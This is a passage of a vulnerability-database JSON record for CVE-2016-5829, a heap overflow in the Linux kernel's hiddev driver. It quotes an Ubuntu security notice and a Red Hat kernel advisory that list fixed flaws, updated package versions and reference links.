    "data": "Multiple heap-based buffer overflows in the hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux kernel through 4.6.3 allow local users to cause a denial of service or possibly have unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call. The Linux kernel is prone to a local heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. \nLocal attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the kernel, denying service to legitimate users. ==========================================================================\nUbuntu Security Notice USN-3070-4\nAugust 30, 2016\n\nlinux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. This update provides the corresponding updates for the\nLinux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\nUbuntu 14.04 LTS. \n\nA missing permission check when settings ACLs was discovered in nfsd. A\nlocal user could exploit this flaw to gain access to any file by setting an\nACL. (CVE-2016-1237)\n\nKangjie Lu discovered an information leak in the Reliable Datagram Sockets\n(RDS) implementation in the Linux kernel. A local attacker could use this\nto obtain potentially sensitive information from kernel memory. \n(CVE-2016-5244)\n\nJames Patrick-Evans discovered that the airspy USB device driver in the\nLinux kernel did not properly handle certain error conditions. (CVE-2016-5400)\n\nYue Cao et al discovered a flaw in the TCP implementation\u0027s handling of\nchallenge acks in the Linux kernel. A remote attacker could use this to\ncause a denial of service (reset connection) or inject content into an TCP\nstream. (CVE-2016-5696)\n\nPengfei Wang discovered a race condition in the MIC VOP driver in the Linux\nkernel. (CVE-2016-5728)\n\nCyril Bur discovered that on PowerPC platforms, the Linux kernel mishandled\ntransactional memory state on exec(). (CVE-2016-5828)\n\nIt was discovered that a heap based buffer overflow existed in the USB HID\ndriver in the Linux kernel. \n(CVE-2016-5829)\n\nIt was discovered that the OverlayFS implementation in the Linux kernel did\nnot properly verify dentry state before proceeding with unlink and rename\noperations. (CVE-2016-6197)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  linux-image-4.4.0-36-generic    4.4.0-36.55~14.04.1\n  linux-image-4.4.0-36-generic-lpae  4.4.0-36.55~14.04.1\n  linux-image-4.4.0-36-lowlatency  4.4.0-36.55~14.04.1\n  linux-image-4.4.0-36-powerpc-e500mc  4.4.0-36.55~14.04.1\n  linux-image-4.4.0-36-powerpc-smp  4.4.0-36.55~14.04.1\n  linux-image-4.4.0-36-powerpc64-emb  4.4.0-36.55~14.04.1\n  linux-image-4.4.0-36-powerpc64-smp  4.4.0-36.55~14.04.1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2016:2574-02\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2016-2574.html\nIssue date:        2016-11-03\nCVE Names:         CVE-2013-4312 CVE-2015-8374 CVE-2015-8543 \n                   CVE-2015-8746 CVE-2015-8812 CVE-2015-8844 \n                   CVE-2015-8845 CVE-2015-8956 CVE-2016-2053 \n                   CVE-2016-2069 CVE-2016-2117 CVE-2016-2384 \n                   CVE-2016-2847 CVE-2016-3070 CVE-2016-3156 \n                   CVE-2016-3699 CVE-2016-3841 CVE-2016-4569 \n                   CVE-2016-4578 CVE-2016-4581 CVE-2016-4794 \n                   CVE-2016-5412 CVE-2016-5828 CVE-2016-5829 \n                   CVE-2016-6136 CVE-2016-6198 CVE-2016-6327 \n                   CVE-2016-6480 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\nRed Hat Enterprise Linux for Containers (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* It was found that the Linux kernel\u0027s IPv6 implementation mishandled\nsocket options. A local attacker could abuse concurrent access to the\nsocket options to escalate their privileges, or cause a denial of service\n(use-after-free and system crash) via a crafted sendmsg system call. \n(CVE-2016-3841, Important)\n\n* Several Moderate and Low impact security issues were found in the Linux\nkernel. Space precludes documenting each of these issues in this advisory. \nRefer to the CVE links in the References section for a description of each\nof these vulnerabilities. (CVE-2013-4312, CVE-2015-8374, CVE-2015-8543,\nCVE-2015-8812, CVE-2015-8844, CVE-2015-8845, CVE-2016-2053, CVE-2016-2069,\nCVE-2016-2847, CVE-2016-3156, CVE-2016-4581, CVE-2016-4794, CVE-2016-5412,\nCVE-2016-5828, CVE-2016-5829, CVE-2016-6136, CVE-2016-6198, CVE-2016-6327,\nCVE-2016-6480, CVE-2015-8746, CVE-2015-8956, CVE-2016-2117, CVE-2016-2384,\nCVE-2016-3070, CVE-2016-3699, CVE-2016-4569, CVE-2016-4578)\n\nRed Hat would like to thank Philip Pettersson (Samsung) for reporting\nCVE-2016-2053; Tetsuo Handa for reporting CVE-2016-2847; the Virtuozzo\nkernel team and Solar Designer (Openwall) for reporting CVE-2016-3156;\nJustin Yackoski (Cryptonite) for reporting CVE-2016-2117; and Linn Crosetto\n(HP) for reporting CVE-2016-3699. The CVE-2015-8812 issue was discovered by\nVenkatesh Pottem (Red Hat Engineering); the CVE-2015-8844 and CVE-2015-8845\nissues were discovered by Miroslav Vadkerti (Red Hat Engineering); the\nCVE-2016-4581 issue was discovered by Eric W. Biederman (Red Hat); the\nCVE-2016-6198 issue was discovered by CAI Qian (Red Hat); and the\nCVE-2016-3070 issue was discovered by Jan Stancek (Red Hat). \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1141249 - Xen guests may hang after migration or suspend/resume\n1234586 - Backtrace after unclean shutdown with XFS v5 and project quotas\n1267042 - XFS needs to better handle EIO and ENOSPC\n1277863 - Test case failure: Screen - Resolution after no Screen Boot on Intel Valley View Gen7 [8086:0f31]\n1278224 - panic in iscsi_target.c\n1283341 - cannot mount RHEL7 NFS server with nfsvers=4.1,sec=krb5 but nfsvers=4.0,sec=krb5 works\n1286261 - CVE-2015-8374 kernel: Information leak when truncating of compressed/inlined extents on BTRFS\n1286500 - Tool thin_dump failing to show \u0027mappings\u0027\n1290475 - CVE-2015-8543 kernel: IPv6 connect causes DoS via NULL pointer dereference\n1292481 - device mapper hung tasks on an openshift/docker system\n1295802 - CVE-2015-8746 kernel: when NFSv4 migration is executed, kernel oops occurs at NFS client\n1297813 - CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted\n1299662 - VFIO: include no-IOMMU mode - not supported\n1300023 - soft lockup in nfs4_put_stid with 3.10.0-327.4.4.el7\n1300237 - CVE-2016-2053 kernel: Kernel panic and system lockup by triggering BUG_ON() in public_key_verify_signature()\n1301893 - CVE-2016-2069  kernel: race condition in the TLB flush logic\n1302166 - MAC address of VF is not editable even when attached to host\n1303532 - CVE-2015-8812 kernel: CXGB3: Logic bug in return code handling prematurely frees key structures causing Use after free or kernel panic. \n1305118 - XFS support for deferred dio completion\n1307091 - fstrim failing on mdadm raid 5 device\n1308444 - CVE-2016-2384 kernel: double-free in usb-audio triggered by invalid USB descriptor\n1308846 - CVE-2016-3070 kernel: Null pointer dereference in trace_writeback_dirty_page()\n1312298 - CVE-2016-2117 kernel: Kernel memory leakage to ethernet frames due to buffer overflow in ethernet drivers\n1313428 - CVE-2016-2847 kernel: pipe: limit the per-user amount of pages allocated in pipes\n1318172 - CVE-2016-3156 kernel: ipv4: denial of service when destroying a network interface\n1321096 - BUG: s390 socketcall() syscalls audited with wrong value in field a0\n1326540 - CVE-2015-8845 CVE-2015-8844 kernel: incorrect restoration of machine specific registers from userspace\n1329653 - CVE-2016-3699 kernel: ACPI table override allowed when securelevel is enabled\n1333712 - CVE-2016-4581 kernel: Slave being first propagated copy causes oops in propagate_mnt\n1334643 - CVE-2016-4569 kernel: Information leak in Linux sound module in timer.c\n1335215 - CVE-2016-4578 kernel: Information leak in events in timer.c\n1335889 - CVE-2016-4794 kernel: Use after free in array_map_alloc\n1349539 - T460[p/s] audio output on dock won\u0027t work\n1349916 - CVE-2016-5412 Kernel: powerpc: kvm: Infinite loop via H_CEDE hypercall when running under hypervisor-mode\n1349917 - CVE-2016-5828 Kernel: powerpc: tm: crash via exec system call on PPC\n1350509 - CVE-2016-5829 kernel: Heap buffer overflow in hiddev driver\n1353533 - CVE-2016-6136 kernel: Race condition vulnerability in execve argv arguments\n1354525 - CVE-2016-6327 kernel: infiniband: Kernel crash by sending ABORT_TASK command\n1355654 - CVE-2016-6198 kernel: vfs: missing detection of hardlinks in vfs_rename() on overlayfs\n1361245 - [Hyper-V][RHEL 7.2] VMs panic when configured with Dynamic Memory as opposed to Static Memory\n1362466 - CVE-2016-6480 kernel: scsi: aacraid: double fetch in ioctl_send_fib()\n1364971 - CVE-2016-3841 kernel: use-after-free via crafted IPV6 sendmsg for raw / tcp / udp / l2tp sockets. \n1383395 - CVE-2015-8956 kernel: NULL dereference in RFCOMM bind callback\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-514.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.el7.noarch.rpm\nkernel-doc-3.10.0-514.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-514.el7.x86_64.rpm\nkernel-debug-3.10.0-514.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-devel-3.10.0-514.el7.x86_64.rpm\nkernel-headers-3.10.0-514.el7.x86_64.rpm\nkernel-tools-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.el7.x86_64.rpm\nperf-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-514.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.el7.noarch.rpm\nkernel-doc-3.10.0-514.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-514.el7.x86_64.rpm\nkernel-debug-3.10.0-514.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-devel-3.10.0-514.el7.x86_64.rpm\nkernel-headers-3.10.0-514.el7.x86_64.rpm\nkernel-tools-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.el7.x86_64.rpm\nperf-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux for Containers (v. 7):\n\nSource:\nkernel-3.10.0-508.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-508.el7.noarch.rpm\nkernel-doc-3.10.0-508.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-508.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-508.el7.ppc64.rpm\nkernel-debug-3.10.0-508.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-508.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-508.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-508.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-508.el7.ppc64.rpm\nkernel-devel-3.10.0-508.el7.ppc64.rpm\nkernel-headers-3.10.0-508.el7.ppc64.rpm\nkernel-tools-3.10.0-508.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-508.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-508.el7.ppc64.rpm\nperf-3.10.0-508.el7.ppc64.rpm\nperf-debuginfo-3.10.0-508.el7.ppc64.rpm\npython-perf-3.10.0-508.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-508.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-508.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-508.el7.ppc64le.rpm\nkernel-debug-3.10.0-508.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-508.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-508.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-508.el7.ppc64le.rpm\nkernel-devel-3.10.0-508.el7.ppc64le.rpm\nkernel-headers-3.10.0-508.el7.ppc64le.rpm\nkernel-tools-3.10.0-508.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-508.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-508.el7.ppc64le.rpm\nperf-3.10.0-508.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-508.el7.ppc64le.rpm\npython-perf-3.10.0-508.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-508.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-508.el7.s390x.rpm\nkernel-debug-3.10.0-508.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-508.el7.s390x.rpm\nkernel-debug-devel-3.10.0-508.el7.s390x.rpm\nkernel-debuginfo-3.10.0-508.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-508.el7.s390x.rpm\nkernel-devel-3.10.0-508.el7.s390x.rpm\nkernel-headers-3.10.0-508.el7.s390x.rpm\nkernel-kdump-3.10.0-508.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-508.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-508.el7.s390x.rpm\nperf-3.10.0-508.el7.s390x.rpm\nperf-debuginfo-3.10.0-508.el7.s390x.rpm\npython-perf-3.10.0-508.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-508.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-508.el7.x86_64.rpm\nkernel-debug-3.10.0-508.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-508.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-508.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-508.el7.x86_64.rpm\nkernel-devel-3.10.0-508.el7.x86_64.rpm\nkernel-headers-3.10.0-508.el7.x86_64.rpm\nkernel-tools-3.10.0-508.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-508.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-508.el7.x86_64.rpm\nperf-3.10.0-508.el7.x86_64.rpm\nperf-debuginfo-3.10.0-508.el7.x86_64.rpm\npython-perf-3.10.0-508.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-508.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-514.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.el7.noarch.rpm\nkernel-doc-3.10.0-514.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-514.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-514.el7.ppc64.rpm\nkernel-debug-3.10.0-514.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-514.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-514.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-514.el7.ppc64.rpm\nkernel-devel-3.10.0-514.el7.ppc64.rpm\nkernel-headers-3.10.0-514.el7.ppc64.rpm\nkernel-tools-3.10.0-514.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-514.el7.ppc64.rpm\nperf-3.10.0-514.el7.ppc64.rpm\nperf-debuginfo-3.10.0-514.el7.ppc64.rpm\npython-perf-3.10.0-514.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-514.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-514.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-514.el7.ppc64le.rpm\nkernel-debug-3.10.0-514.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-514.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-514.el7.ppc64le.rpm\nkernel-devel-3.10.0-514.el7.ppc64le.rpm\nkernel-headers-3.10.0-514.el7.ppc64le.rpm\nkernel-tools-3.10.0-514.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-514.el7.ppc64le.rpm\nperf-3.10.0-514.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-514.el7.ppc64le.rpm\npython-perf-3.10.0-514.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-514.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-514.el7.s390x.rpm\nkernel-debug-3.10.0-514.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.s390x.rpm\nkernel-debug-devel-3.10.0-514.el7.s390x.rpm\nkernel-debuginfo-3.10.0-514.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-514.el7.s390x.rpm\nkernel-devel-3.10.0-514.el7.s390x.rpm\nkernel-headers-3.10.0-514.el7.s390x.rpm\nkernel-kdump-3.10.0-514.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-514.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-514.el7.s390x.rpm\nperf-3.10.0-514.el7.s390x.rpm\nperf-debuginfo-3.10.0-514.el7.s390x.rpm\npython-perf-3.10.0-514.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-514.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-514.el7.x86_64.rpm\nkernel-debug-3.10.0-514.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-devel-3.10.0-514.el7.x86_64.rpm\nkernel-headers-3.10.0-514.el7.x86_64.rpm\nkernel-tools-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.el7.x86_64.rpm\nperf-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-514.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-514.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-514.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-514.el7.ppc64.rpm\nperf-debuginfo-3.10.0-514.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-514.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-514.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-514.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-514.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-514.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-514.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-514.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-514.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-514.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.el7.noarch.rpm\nkernel-doc-3.10.0-514.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-514.el7.x86_64.rpm\nkernel-debug-3.10.0-514.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-devel-3.10.0-514.el7.x86_64.rpm\nkernel-headers-3.10.0-514.el7.x86_64.rpm\nkernel-tools-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.el7.x86_64.rpm\nperf-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2013-4312\nhttps://access.redhat.com/security/cve/CVE-2015-8374\nhttps://access.redhat.com/security/cve/CVE-2015-8543\nhttps://access.redhat.com/security/cve/CVE-2015-8746\nhttps://access.redhat.com/security/cve/CVE-2015-8812\nhttps://access.redhat.com/security/cve/CVE-2015-8844\nhttps://access.redhat.com/security/cve/CVE-2015-8845\nhttps://access.redhat.com/security/cve/CVE-2015-8956\nhttps://access.redhat.com/security/cve/CVE-2016-2053\nhttps://access.redhat.com/security/cve/CVE-2016-2069\nhttps://access.redhat.com/security/cve/CVE-2016-2117\nhttps://access.redhat.com/security/cve/CVE-2016-2384\nhttps://access.redhat.com/security/cve/CVE-2016-2847\nhttps://access.redhat.com/security/cve/CVE-2016-3070\nhttps://access.redhat.com/security/cve/CVE-2016-3156\nhttps://access.redhat.com/security/cve/CVE-2016-3699\nhttps://access.redhat.com/security/cve/CVE-2016-3841\nhttps://access.redhat.com/security/cve/CVE-2016-4569\nhttps://access.redhat.com/security/cve/CVE-2016-4578\nhttps://access.redhat.com/security/cve/CVE-2016-4581\nhttps://access.redhat.com/security/cve/CVE-2016-4794\nhttps://access.redhat.com/security/cve/CVE-2016-5412\nhttps://access.redhat.com/security/cve/CVE-2016-5828\nhttps://access.redhat.com/security/cve/CVE-2016-5829\nhttps://access.redhat.com/security/cve/CVE-2016-6136\nhttps://access.redhat.com/security/cve/CVE-2016-6198\nhttps://access.redhat.com/security/cve/CVE-2016-6327\nhttps://access.redhat.com/security/cve/CVE-2016-6480\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.3_Release_Notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFYGvnGXlSAg2UNWIIRAt0KAJ9EHwzXCUk4h0/OWw0UutzqBegyHQCgudbG\nnc4j6RLeW23njfwjT51CsVU=\n=N1Fg\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "BID",
        "id": "91450"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "db": "PACKETSTORM",
        "id": "138556"
      },
      {
        "db": "PACKETSTORM",
        "id": "138539"
      },
      {
        "db": "PACKETSTORM",
        "id": "138540"
      },
      {
        "db": "PACKETSTORM",
        "id": "138536"
      },
      {
        "db": "PACKETSTORM",
        "id": "138555"
      },
      {
        "db": "PACKETSTORM",
        "id": "139502"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-5829",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "91450",
        "trust": 2.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2016/06/26/2",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-5829",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138556",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138539",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138540",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138536",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138555",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139502",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "db": "BID",
        "id": "91450"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "PACKETSTORM",
        "id": "138556"
      },
      {
        "db": "PACKETSTORM",
